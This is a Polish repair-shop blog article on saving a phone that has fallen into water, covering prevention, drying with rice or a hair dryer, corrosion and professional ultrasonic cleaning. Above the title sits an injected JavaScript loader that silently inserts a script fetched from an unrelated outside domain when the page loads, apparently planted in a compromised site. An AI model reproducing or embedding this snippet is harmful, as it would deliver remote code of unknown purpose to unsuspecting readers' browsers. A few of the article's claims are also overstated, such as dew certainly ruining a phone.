;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jak uratować zalany telefon? Poradnik SILICO-BIT | Silico-Bit
Telefon zabieramy ze sobą dosłownie wszędzie, jednocześnie narażając go na rożnego rodzaju uszkodzenia. Badania wykazują, że aż niemal 10% wszystkich uszkodzeń smartfonów dotyczy ich zalania. Czy są sposoby, żeby uchronić urządzenie przed taki sytuacjami i jak uratować zalany telefon, zanim będzie za późno?

jak-uratowac-zalany-telefon

Jak uratować zalany telefon, kiedy nie chce się włączyć?

Wystarczy dosłownie chwila nieuwagi, a nasz telefon ląduje w kawie, zupie czy wannie. Z uwagi na funkcje telefonu, w dzisiejszych czasach to najczęściej używany przez nas sprzęt elektroniczny.  Korzystamy z niego nie tylko w celach komunikacyjnych i rozrywkowych, ale także wykorzystujemy jako narzędzie pracy. Dlatego tak często jest on w naszych rękach. Zalanie telefonu może spotkać nas w każdej sytuacji i pod wpływem różnych czynników. m.in:

  • pozostawienia telefonu na deszczu
  • upadku w kałużę
  • zawilgocenia podczas przebywania w saunie
  • płynnych substancji

Reakcje smartfona mogą być różne. Z jednej strony telefon może się całkowicie wyłączyć, z drugiej wyświetlacz może być czynny, ale pojawi się wiele objawów usterki, które nie będą umożliwiały sprawnego korzystania ze sprzętu. Najważniejszą kwestią przy zalaniu telefonu jest zasada:
MYŚL RACJONALNIE. Nie cofniesz już tego a nieskoordynowane, przypadkowe działania mogą tylko pogłębić problem. Wobec tego nie panikuj, kiedy zobaczysz telefon cały w mokrej substancji, a zamiast tego działaj zdecydowanie i przede wszystkim szybko! Od razu chwyć telefon, wyciągnij go z wody i osusz ręcznikiem papierowym albo czymś, co masz pod ręką i co dobrze wchłania wilgoć. Zalanym stołem czy podłogą zajmiesz się później – one nie ucierpią tak, jak telefon.

Jak zapobiec zalaniu telefonu?

Pod hasłem zalanie telefonu nie mieści się tylko rozlanie na niego płynu lub przypadkowe wrzucenie go do cieczy. Mamy tu na myśli także zawilgocenie sprzętu poprzez różne nieprzemyślane działania. Jak zapobiec zalaniu telefonu?

  1. Zasada 1– nie bierz telefonu do sauny
  2. Zasada 2– nigdy nie zostawiaj telefonu pod gołym niebem, nawet jeśli odchodzisz tylko na moment. Nie musi spaść deszcz, aby telefon został zalany. Może się to stać również poprzez poranną czy wieczorną rosę. To więcej niż pewne, że w spotkaniu z tym zjawiskiem atmosferycznym, telefon nie wyjdzie cało z opresji.
  3. Zasada 3– zalanie telefonu może zdarzyć się każdemu. O ile spełnisz dwie powyższe zasady, nigdy nie przewidzisz, czy telefon nie wpadnie Ci do wanny lub czy nie wylejesz na niego wody. Dlatego nie obwiniaj się i działaj!

Jak uratować zalany telefon domowymi sposobami?

Ryż. Z pewnością wielokrotnie słyszałeś o suszeniu zalanego telefonu ryżem. I na szczęście nie jest to do końca fałszywa informacja. Rzeczywiście, ryż posiada właściwości higroskopijne, które wciągają wilgoć. Pamiętaj, że zanim włożysz jednak telefon do ryżu, należy go rozkręcić tak, aby ryż przedostał się do wewnętrznych zakamarków sprzętu. Jeśli tego nie zrobisz, wkładanie telefonu w ryż na nic się nie zda. Niestety z ryżem związane jest pewne ryzyko – pyłek z tego spożywczego produktu może uszkodzić mikroskopijne elementy i telefon nie będzie nadawał się już do użytku.

Suszarka. Jeśli wolisz znaną wszystkim opcję z suszarką, możesz wypróbować ten sposób. Nie masz jednak pewności, ze dokładnie osuszyłeś wszystkie elementy, szczególnie te wewnętrzne. Dlatego suszarka może nie zdać egzaminu.

A co z korozją? Wysuszenie telefonu to sprawa dyskusyjna. Niestety pod wpływem wody w wewnętrznych częściach, może dochodzić do korozji w lutowanych elementach. Nawet jeśli telefon zacznie działać po wysuszeniu, istnieje duże prawdopodobieństwo, że po jakimś czasie zupełnie przestanie działać. Co wtedy należy zrobić?

zalany-telefon

Jak uratować zalany telefon, kiedy nic nie pomaga?

Właściwie kiedy już korozja zadziała w wewnętrznych lutowaniach, masz jedną możliwość. Musisz zgłosić się do punktu, który posiada wanienkę ultradźwiękową z wodą destylowaną, działającą pod ciśnieniem. Tylko w ten sposób jest możliwe wypłukanie korozji z wnętrza telefonu. Zajmują się tym profesjonalne serwisy naprawy smartfonów i sprzętu elektronicznego.

Jeśli Twój telefon nie jest wodoodporny i uległ zalaniu, bardzo ważne jest, aby zaraz po incydencie zadziałać dogłębnie jak najszybciej. Jeśli nie masz w domu odpowiednich narzędzi, aby rozkręcić smartfon, a chcesz uratować swój ukochany sprzęt i wszystkie pliki, zgłoś się do profesjonalnego serwisu telefonów. Tak otrzymasz szybką i kompleksową pomoc, a przede wszystkim unikniesz korozji i zniszczeniu urządzenia.